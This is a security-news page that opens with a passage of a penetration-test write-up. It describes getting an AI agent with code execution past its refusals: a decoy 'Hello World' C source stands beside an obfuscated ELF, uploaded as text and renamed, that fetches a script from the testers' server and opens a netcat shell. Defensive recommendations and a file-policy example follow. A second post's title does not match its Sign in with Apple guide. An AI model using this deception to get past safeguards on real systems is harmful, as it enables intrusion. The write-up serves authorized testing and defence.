data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-22a0e32 elementor-widget elementor-widget-text-editor" data-id="22a0e32" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This kind of automated LLM-on-LLM testing saved us an immense amount of effort on this engagement. It’s exactly why we’ve been building tools like <a href="https://github.com/praetorian-inc/julius">Julius</a> (for fingerprinting AI services) and Augustus, which we’ve recently added to our Guard platform. If the attack surface keeps growing, the testing efficiency has to keep up.</p> <h3><strong>Discovering Weaknesses</strong></h3> <p>After a couple hours of this, patterns started to emerge. The agent had strong restrictions on most dangerous operations; ask it to run a bash command or write a shell script and it would refuse.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dbe2500 e-con-full e-flex e-con e-parent" data-id="dbe2500" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f46e27a elementor-widget elementor-widget-image" data-id="f46e27a" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="208" src="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp" class="attachment-full size-full wp-image-10912" alt="Screenshot of a chat interface showing user asking 'Ls the files in /app/worker' and AI responding it cannot help with that request" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-300x51.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-1024x174.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-768x131.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-36a274d e-con-full e-flex e-con e-parent" data-id="36a274d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c9b6cfe elementor-widget elementor-widget-text-editor" data-id="c9b6cfe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, it really liked “Hello World” programs. It was more than happy to create <strong>and run</strong> a simple test script. This is worth noting for similar-style engagements. LLMs are trained to be helpful, and “Hello World” scripts are some of the most common within their training data. 
That makes this a reliable foot-in-the-door when testing agents with code execution.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-46de128 e-con-full e-flex e-con e-parent" data-id="46de128" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-023513d elementor-widget elementor-widget-image" data-id="023513d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="398" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp" class="attachment-full size-full wp-image-10913" alt="Terminal window showing a user request to create a hello world bash script, with status showing 'Bash Script Executed Successfully" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-300x98.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-1024x333.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-768x250.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a7276b7 e-con-full e-flex e-con e-parent" data-id="a7276b7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b693558 elementor-widget elementor-widget-text-editor" data-id="b693558" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>More importantly, while it wouldn’t create anything 
it considered dangerous, it was perfectly willing to <strong>modify</strong> existing files. Changing a file extension or making something executable was all fine.</p> <p>Using the application’s file upload feature, you could upload text, images, or CSV files, and they’d land in the sandbox. Combined with the agent’s willingness to rename and chmod, this was effectively arbitrary file upload.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9b069a1 e-con-full e-flex e-con e-parent" data-id="9b069a1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-67341f4 elementor-widget elementor-widget-image" data-id="67341f4" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1414" height="277" src="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp" class="attachment-full size-full wp-image-10914" alt="Two chat messages in dark interface. First asks to fix filetype of env_check2.txt and move to cwd. Second confirms task." 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp 1414w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-1024x201.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-768x150.webp 768w" sizes="auto, (max-width: 1414px) 100vw, 1414px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-22eaa52 e-con-full e-flex e-con e-parent" data-id="22eaa52" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-038e023 elementor-widget elementor-widget-text-editor" data-id="038e023" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <h3><strong>Hitting a Wall</strong></h3> <p>Getting code execution should have been straightforward from there – just upload a script and have the agent execute it – but it wasn’t. Opus 4.5 is genuinely good at catching malicious payloads, and it blocked everything we threw at it:</p> <ul> <li>Obfuscated/encoded scripts would get decoded and blocked (or rejected outright citing an inability to verify safety).</li> <li>A wrapper script that runs everything in a directory failed, as it understood the context and inspected each script individually first.</li> <li>Swapping a benign script for a malicious one after building trust didn’t work because it re-read the file before every execution (and the architecture prevented races).</li> </ul> <p>The model had a clear policy: if it couldn’t understand what something did, it wouldn’t run it. And if it could understand it and it looked dangerous, it wouldn’t run it either. 
We needed something that Opus 4.5 <strong>thought</strong> it understood and <strong>believed</strong> was harmless.</p> <h3><strong>The Trick</strong></h3> <p>The answer came from the “Hello World” observation from earlier. The agent trusted simple programs, and it trusted its own ability to read C code and verify what a binary does. But what if the source code doesn’t actually match the binary?</p> <p>We created two separate programs. The first was legitimate C source code for a hello world program that also calls <code>system("date")</code>, giving a plausible reason for a <code>system()</code> call to exist in the binary.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e2eaa69 e-con-full e-flex e-con e-parent" data-id="e2eaa69" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-147333b elementor-widget elementor-widget-image" data-id="147333b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1151" height="387" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp" class="attachment-full size-full wp-image-10915" alt="C code editor showing hello_world.c file with main function containing printf Hello World, system date command, and return 0" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp 1151w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-1024x344.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-768x258.webp 768w" sizes="auto, (max-width: 
1151px) 100vw, 1151px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cc9dabb e-con-full e-flex e-con e-parent" data-id="cc9dabb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-198d3a9 elementor-widget elementor-widget-text-editor" data-id="198d3a9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The second was the actual payload binary. A statically compiled ELF that downloads and executes a shell script from our server, while also running the same commands as the decoy. We statically compiled it so the binary would be large enough (~600KB) that Claude couldn’t easily analyze it. We also performed a basic XOR against the payload to make it harder to decode.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f96d11 e-con-full e-flex e-con e-parent" data-id="9f96d11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5c68bb elementor-widget elementor-widget-image" data-id="a5c68bb" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1638" height="646" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp" class="attachment-full size-full wp-image-10916" alt="C code editor showing malicious program with encoded payload array, XOR decoding loop, and system() call to execute decoded commands" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp 1638w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-300x118.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1024x404.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-768x303.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1536x606.webp 1536w" sizes="auto, (max-width: 1638px) 100vw, 1638px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ed08f7b e-con-full e-flex e-con e-parent" data-id="ed08f7b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bcf88af elementor-widget elementor-widget-image" data-id="bcf88af" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1000" height="232" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp" class="attachment-full size-full wp-image-10917" alt="Terminal output showing two copied files: hello_world ELF 64-bit executable with magic bytes 7f 45 4c 46, and hello_world.c C source file" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp 1000w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-300x70.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-768x178.webp 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px"><figcaption class="widget-image-caption wp-caption-text">Terminal display confirms successful compilation of a C program into an executable ELF binary, ready for analysis or execution.</figcaption></figure> </div> </div> <div 
data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7557e01 e-con-full e-flex e-con e-parent" data-id="7557e01" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-abfa907 elementor-widget elementor-widget-image" data-id="abfa907" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1216" height="158" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp" class="attachment-full size-full wp-image-10918" alt="Terminal screenshot showing 'nc -l 13339' command and 'id' command output displaying uid=1001(appuser) gid=1001(appuser) groups=1001(appuser)" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp 1216w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-300x39.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-1024x133.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-768x100.webp 768w" sizes="auto, (max-width: 1216px) 100vw, 1216px"><figcaption class="widget-image-caption wp-caption-text">Command line interface showing a netcat listener on port 13339 and the id command revealing the current user as ‘appuser’ with UID 1001.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-3c1a07a e-con-full e-flex e-con e-parent" data-id="3c1a07a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3aa94a7 elementor-widget elementor-widget-text-editor" 
data-id="3aa94a7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The sandbox contained the application’s entire business logic. System prompts, MCP tool definitions, the Dockerfile used to build the environment, and the Node.js server running all the integrations. In short: the crown jewels.</p> <h3><strong>Takeaways</strong></h3> <p>If you’re building or deploying AI agents with code execution capabilities, don’t rely on the model’s judgment as a security control. It can be fooled. Here’s what we recommended to the client:</p> <ul> <li><strong>Restrict executable operations at the OS level:</strong> The sandbox should prevent the agent from setting the execute bit on user-uploaded files or running binaries that weren’t pre-installed in the image.</li> <li><strong>Validate uploaded files by content, not just extension:</strong> Check magic bytes. An ELF binary with a .txt extension should be rejected. Content-type validation should persist through file rename operations.</li> <li><strong>Add tool-level guardrails for dangerous operations:</strong> Renames, permission changes, and execution of anything that was not part of the image should be gated by deterministic checks in the tool layer, not left to the model’s judgment of whether the request looks harmless.</li> <li><strong>Lock down network egress:</strong> The sandbox didn’t need total outbound internet connectivity, as it only really interfaced with a couple of external APIs. Outbound firewalling, while not a primary control, can greatly hinder post-exploitation activity.</li> </ul> <p>Findings and recommendations like these are part of what we do continuously through our <a href="https://www.praetorian.com/guard/">Guard platform</a>. Guard continuously monitors and tests internet-facing and internally deployed infrastructure, including AI agents and LLM-powered applications, as they evolve and change over time. Got a new agentic deployment, model version, or MCP tool? 
Guard picks it up and our operators test it, identifying vulnerabilities just like this.</p> <h2>FAQ</h2> <h3>Why did static compilation matter?</h3> <p>A dynamically linked binary is small enough that the LLM could potentially inspect the raw bytes and identify suspicious library calls like network functions. A statically compiled binary is hundreds of kilobytes of noise, making it effectively opaque to the model.</p> <h3>What is Augustus?</h3> <p>Augustus is Praetorian’s Go-based LLM vulnerability scanner. It tests large language models against a wide range of adversarial attacks and jailbreaks. In this case, we used its methodology to automate the discovery of behavioral weaknesses in the target agent.</p> <h3>Did this affect real customer data?</h3> <p>This was conducted during an authorized penetration test. The sandbox environment was isolated, and we did not access or exfiltrate any customer data. The client has since remediated the vulnerability.</p> <h3>Could this work against other LLM agents?</h3> <p>The core technique exploits a general weakness: LLMs are trained to assist, and “Hello World” scripts are among the most common things they’re asked to produce. Any agent with code execution that treats “simple test script” as a safe category is potentially giving attackers a method of initial access. 
On top of that, the faked source code trick exploits another general weakness: LLMs will often trust contextual information over direct inspection when the direct inspection is too difficult.</p> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">Which Came First: The System Prompt, or the RCE?</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/</a> </p>
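The two Takeaways about validating uploads by content and keeping the execute bit away from uploaded files, as an added example that is not Praetorian's code or the client's: a deterministic policy that labels each upload by its leading bytes, carries that label through renames, and refuses execute bits on anything uploaded, so the model is never the one deciding whether a file operation is safe. The PE and Mach-O signatures, the extension lists and the class and function names are assumptions made here.

```python
"""Deterministic upload and file-operation policy for an agent sandbox.
Added example (not the client's code or Praetorian's): classify uploads by
their leading bytes, not their extension, and keep that label attached to the
file so later rename and chmod requests are judged against what the file is.
"""
import os
import stat
from dataclasses import dataclass

# Leading bytes of native executables. The ELF signature (7f 45 4c 46) is the one
# shown in the post; the PE and Mach-O signatures are assumptions added here.
EXECUTABLE_MAGIC = {
    b"\x7fELF": "elf",
    b"MZ": "pe",
    b"\xfe\xed\xfa\xce": "macho",
    b"\xfe\xed\xfa\xcf": "macho",
    b"\xce\xfa\xed\xfe": "macho",
    b"\xcf\xfa\xed\xfe": "macho",
    b"\xca\xfe\xba\xbe": "macho-fat",
}
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# The upload feature in the post accepted text, images and CSV; nothing else.
ALLOWED_LABELS = {"text", "png", "jpeg", "gif"}
TEXT_EXTENSIONS = {".txt", ".csv", ".md"}                   # assumed text-only extensions
EXEC_EXTENSIONS = {".sh", ".py", ".pl", ".rb", ".bin", ""}  # "" = no extension at all
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def classify(data: bytes) -> str:
    """Label a blob by content: executables first, then images, then UTF-8 text.
    Fails closed: anything unrecognised is "binary" and is never accepted."""
    head = data[:8]
    for magic, label in EXECUTABLE_MAGIC.items():
        if head.startswith(magic):
            return label
    if head.startswith(b"#!"):          # interpreter script such as #!/bin/sh
        return "script"
    for magic, label in IMAGE_MAGIC.items():
        if head.startswith(magic):
            return label
    sample = data[:4096]
    if b"\x00" in sample:               # NUL bytes do not occur in real text files
        return "binary"
    try:
        sample.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text"


@dataclass
class Decision:
    allowed: bool
    reason: str


class SandboxFilePolicy:
    """Deterministic hook in front of the agent's file tools; the model is never consulted."""

    def __init__(self) -> None:
        self.labels = {}   # path -> content label; the label survives renames

    def upload(self, name: str, data: bytes) -> Decision:
        label = classify(data)
        ext = os.path.splitext(name)[1].lower()
        if label not in ALLOWED_LABELS:
            return Decision(False, f"{name}: content is {label}, not an accepted upload type")
        if ext in TEXT_EXTENSIONS and label != "text":
            return Decision(False, f"{name}: {ext} extension but content is {label}")
        self.labels[name] = label
        return Decision(True, f"{name}: accepted as {label}")

    def rename(self, old: str, new: str) -> Decision:
        label = self.labels.get(old)
        if label is None:
            return Decision(False, f"{old}: not a tracked upload")
        if os.path.splitext(new)[1].lower() in EXEC_EXTENSIONS:
            return Decision(False, f"{new}: executable-looking name for an uploaded {label} file")
        self.labels[new] = self.labels.pop(old)   # the label travels with the file
        return Decision(True, f"{old} -> {new}")

    def chmod(self, name: str, mode: int) -> Decision:
        if name in self.labels and mode & EXEC_BITS:
            return Decision(False, f"{name}: execute bit is never granted to uploaded files")
        return Decision(True, f"{name}: mode {oct(mode)}")


if __name__ == "__main__":
    # Constructed sample: an ELF header uploaded under a .txt name, as in the post.
    policy = SandboxFilePolicy()
    print(policy.upload("env_check2.txt", b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 24).reason)
    print(policy.upload("inventory.csv", b"id,name\n1,alice\n").reason)
    print(policy.rename("inventory.csv", "inventory").reason)
    print(policy.chmod("inventory.csv", 0o755).reason)
```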

Quantum-Hardened Granular Resource Authorization Policies

  • Published date: 2026-03-24 00:00:00


<h2>The big shift from Apple ID to Apple Account</h2><p>Ever wonder why that little button on your screen suddenly changed its name? It’s not just some marketing person at Apple bored on a Tuesday; it’s a real shift in how identity is handled for SaaS.</p><p>Moving from "Apple ID" to <strong>Apple Account</strong> is about killing off legacy baggage. The old name felt like a username for a store, but the new one is a full identity layer that works the same whether you're on an iPad or in a browser. Apple is rebranding the whole system to be more of a "digital passport" than just a login for buying apps.</p><ul> <li><strong>Unified Trust</strong>: When users see "Apple Account," they associate it with their entire digital life. This boosts "login button" conversion in industries like <strong>finance</strong>, where trust is everything.</li> <li><strong>Ecosystem Consistency</strong>: It creates a seamless flow across retail apps and healthcare portals. If a patient logs into a portal using their Apple Account, the familiarity reduces drop-off rates.</li> <li><strong>Brand Maturity</strong>: It signals that Apple is serious about being a primary identity provider, competing directly with Google and Microsoft.</li> </ul><p>Under the hood, this isn't magic. It’s built on <strong>OAuth 2.0</strong> and <strong>OpenID Connect</strong>. 
One of the coolest features for developers is the <strong>private email relay</strong>, which lets users hide their real address while still letting you send them email.</p><p><strong>The Flow of Identity Trust</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-1.svg" alt="The Flow of Identity Trust"></p><p>According to <a href="https://developer.apple.com/sign-in-with-apple/">Apple's official documentation</a>, this system uses on-device biometrics like <strong>Touch ID</strong> and <strong>Face ID</strong>, so users don't even have to remember a password. This is huge for security professionals trying to kill off password phishing.</p><p>Honestly, it’s a relief to see them simplify this. Next, let’s look at how this shift affects the messy world of corporate IT.</p><h2>Identity management in the enterprise world</h2><p>Most employees are already carrying an iPhone in their pocket, and honestly, they're tired of juggling fifteen different work passwords just to check a simple spreadsheet. It's no wonder they keep trying to use their personal accounts for everything; it's just easier.</p><p>The line between "work life" and "home life" is basically gone when it comes to hardware. People trust their Face ID more than they trust a clunky corporate VPN. When you let someone sign in with their Apple Account, you aren't just giving them a button; you're giving them a shortcut that they actually understand.</p><p>In healthcare, for instance, a nurse needs to update a patient chart fast without fighting a login screen. In retail, a floor manager using an iPad wants to check inventory between helping customers. If the login is slow, they'll find a workaround, and usually those workarounds are a security nightmare.</p><p>But here is the catch for the IT team. Managing a bunch of individual Apple Accounts in a B2B environment is like herding cats. 
You've got directory synchronization issues and the "orphaned account" problem, where an employee leaves but still has access to the SaaS app because their personal account was never unlinked.</p><ul> <li><strong>Directory Mess</strong>: Most enterprise apps rely on Active Directory or Okta, which don't always play nicely with consumer-facing identity providers.</li> <li><strong>Security Gaps</strong>: If a user bypasses the official SSO to use their Apple Account, you lose visibility into who is doing what.</li> <li><strong>Provisioning</strong>: Manually adding or removing users from every single tool is a waste of time that nobody has.</li> </ul><p>To fix this, many companies use <strong>identity orchestration platforms</strong> or <strong>Auth-as-a-Service</strong> tools. A platform like <strong>SSOJet</strong> comes in handy here. It acts like a bridge, letting users have that easy "Apple experience" while keeping the IT department happy because everything still flows through the central management system. It's basically the "peace treaty" between employee convenience and enterprise security.</p><p><strong>Diagram: The SaaS Implementation Lifecycle</strong></p><pre><code class="language-mermaid">graph LR
    A[Employee] --&gt; B{SSOJet Gateway}
    B --&gt; C[Apple Account Auth]
    B --&gt; D[Enterprise Directory/Okta]
    C --&gt; E[SaaS App Access]
    D --&gt; E
</code></pre><p>According to <a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-22-gartner-says-75-percent-of-staff-will-use-personal-mobile-devices-for-work-by-2024">Gartner</a>, about 75% of staff will be using personal devices for work by the end of 2024. This makes it pretty clear that we can't just ignore these personal identity layers anymore.</p><p>So, it's about making things work together rather than fighting the trend. 
Next, let's talk about the "intelligence" behind these accounts and where things are heading.</p><h2>AI integration and the future of sign-in</h2><p>Imagine if your phone knew you were about to log in before you even moved a finger. With the way AI is going, Apple is basically turning your "Apple Account" into a digital brain that handles the heavy lifting of security so you don't have to.</p><p>It's not just about chatbots; it's about how the silicon in your pocket learns your habits. If you usually check your work email at 8 AM from your home Wi-Fi, the on-device AI recognizes that pattern. If someone tries to log in from a random city at 3 AM, the system knows something is fishy without even needing a database check.</p><ul> <li><strong>Predictive Security</strong>: The device uses local machine learning to verify "user intent," basically making sure a human actually meant to click that button and it wasn't a pocket-dial or a script.</li> <li><strong>Secure Enclave Magic</strong>: All this AI processing happens right on the chip, not in some vulnerable cloud. Your biometric data never leaves the hardware, which is a huge win for privacy.</li> <li><strong>Contextual Friction</strong>: If the AI is confident it's you, the login is instant. If things look weird, it can trigger an extra verification step automatically.</li> </ul><blockquote> <p>According to <a href="https://www.cybersecurity-insiders.com/portfolio/2024-identity-and-access-management-report/">Cybersecurity Insiders</a>, 80% of data breaches involve compromised passwords, which is why AI-driven, passwordless flows are becoming the gold standard for SaaS founders.</p> </blockquote><p>For a developer, this means you can stop worrying about complex fraud detection. 
Here is how you might check whether a credential is "likely" coming from a real user session:</p><pre><code class="language-python">def verify_login_intent(session_data):
    """Fast-track only when the device attested a biometric check and the trust score is high."""
    if session_data.is_biometric_verified and session_data.trust_score &gt; 0.9:
        return "Fast-track access granted"
    return "Trigger MFA challenge"
</code></pre><p>It’s honestly wild how much we’re moving away from "what you know" (passwords) to "how you behave." Next up, we should look at the actual technical hurdles you'll hit when building this.</p><h2>SaaS implementation and developer hurdles</h2><p>Setting this up isn't exactly a "walk in the park" once you move past the marketing slides. If you're a developer, you know the real headache starts when you actually have to make the Apple Account handshake work with your existing backend without breaking everything.</p><p>It’s not just adding a button; it's managing a whole new set of keys and identifiers that Apple demands. You can't just wing it like a basic OAuth setup.</p><ul> <li><strong>Client Secret Woes</strong>: Unlike other providers, where you get a permanent string, Apple makes you generate a <strong>JWT</strong> (JSON Web Token) signed with your private key, and the resulting token expires. If the job that regenerates it fails, your login button goes dead.</li> <li><strong>The "Sub" Problem</strong>: The user identifier (the <code>sub</code> claim) is unique to your developer team. If you're moving an app between accounts or merging companies, mapping those old users to new IDs is a total nightmare.</li> <li><strong>Web vs Native</strong>: Getting the flow to feel "native" on an iPhone while keeping a consistent session in a web browser requires some serious state management.</li> </ul><p>You can't just trust the frontend when it says "yeah, this guy is legit." You have to verify that identity token on your server. 
Here is a look at how you might pull that off in Node:</p><pre><code class="language-javascript">const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');

// Apple publishes the public keys that sign identity tokens here; fetch them first.
const client = jwksClient({ jwksUri: 'https://appleid.apple.com/auth/keys' });

// Your Services ID or bundle ID as registered with Apple (placeholder value);
// the token's aud claim must match it, or the token was minted for a different app.
const APPLE_CLIENT_ID = 'com.example.yourapp';

function verifyAppleToken(token) {
  const decoded = jwt.decode(token, { complete: true });
  if (!decoded || !decoded.header || !decoded.header.kid) {
    console.error("not a well-formed JWT");
    return;
  }
  // NOTE: This is a simplified example. In production, you need robust
  // error handling for the jwksClient and asynchronous callback logic.
  client.getSigningKey(decoded.header.kid, (err, key) =&gt; {
    if (err) {
      console.error("Key fetching failed", err);
      return;
    }
    const signingKey = key.publicKey || key.rsaPublicKey;
    // Pin the algorithm and check issuer and audience; a valid signature alone is not enough.
    jwt.verify(token, signingKey, {
      issuer: 'https://appleid.apple.com',
      audience: APPLE_CLIENT_ID,
      algorithms: ['RS256']
    }, (err, payload) =&gt; {
      if (err) console.error("token is trash", err.message);
      else console.log("user is verified", payload.sub);
    });
  });
}
</code></pre><p>Honestly, most teams trip up on the <strong>email relay</strong> service. If a user chooses "Hide My Email" and your database expects a unique primary key based on email, you’re going to have a bad time when they try to link accounts later; key users on the <code>sub</code> claim instead.</p><p>As mentioned earlier, using a middle layer can save you from this manual labor, but if you're going DIY, watch those expiration dates on your secrets. Next, let’s wrap up with the big picture for founders.</p><h2>The final verdict for SaaS founders</h2><p>So, is it actually worth the dev time to pivot to Apple Account? If you’re building a SaaS app today, the answer is usually "yes," but don't expect it to be a magic wand that fixes a bad product.</p><p>It really comes down to three things:</p><ul> <li><strong>Conversion wins</strong>: I've seen checkout pages in retail and finance jump by 20% just because users didn't have to type an email. 
Face id is just faster than a brain.</li> <li><strong>Security debt</strong>: By offloading auth to apple, you’re basically letting their billion-dollar security team handle the pii headaches. It makes your startup look way more "pro" to enterprise buyers.</li> <li><strong>Maintenance trap</strong>: As mentioned earlier, keeping those <strong>JWT tokens</strong> and private keys updated is a chore. If you don't automate it, your login button will break during a holiday weekend.</li> </ul><p>For founders, this isn't just a feature; it's about meeting users where they already live. Whether it's a doctor accessing healthcare records or a manager checking inventory, they want zero friction.</p><p><strong>The User Authentication Journey</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-2.svg" alt="The User Authentication Journey"></p><p>Honestly, just don't overthink the "apple account" rebrand. It's the same tech under the hood, just with a friendlier face. 
If you value your sleep and your users' data, it's a solid bet.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies">https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies</a> </p>

Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines

  • Published date: 2026-03-24 00:00:00


